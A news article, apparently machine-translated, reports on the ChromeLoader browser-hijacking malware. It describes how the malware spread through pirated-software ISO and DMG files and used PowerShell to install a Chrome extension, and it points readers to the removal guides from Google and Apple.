During May, a rather high diffusion of malware ChromeLoaderwhich allows its operators to carry out transactions hijacking on the browser in order to promote unwanted software, open pages devoted to surveys and sweepstakes, as well as adult games and bogus dating sites. All this with the aim of earning money through affiliation. Among the various hijackers on the network, ChromeLoader stands out for its persistence on systems, for its spread and for the methods of infection that involve intensive use of PowerShell.
The wanted people of Red Canary have been tracking this malware since February and have identified the primary attack vector, which is an ISO archive file used by cybercriminals to infect victims’ systems. The ISO file was camouflaged as a cracked executable file, for games or commercial software pirateswhich was downloaded independently by users through compromised sites or containing lists of torrent files, complete with a promotional campaign on Twitter, where Android games subject to cracks and QR codes that directed users to sites were presented dangerous.
Malware often affects web browsers
Once the file was run on Windows, with the ISO mount as a virtual drive, the user found an executable inside it, passed off as crack or keygen, which is a program that generates bogus license codes. Once the file was run, ChromeLoader ran, decrypting a PowerShell command to recover a remote archive, loaded as a Google Chrome extension. At the end of the operation, there was no trace of the activity, only the extension that, in a discreet way, hijacked Chrome on the sites of interest of the operators. The same, however, was found on macOS, where the compromised files were of type DMG, with one bash script able to download and unpack the ChromeLoader extension to a temporary directory.
For get rid of the threatboth Google and Apple have prepared special guides, freely available:
As always, we remind you that downloading pirated materials is illegalbut also a lot dangerousas you expose yourself to serious risks, not least the possibility of suffering an attack ransomware.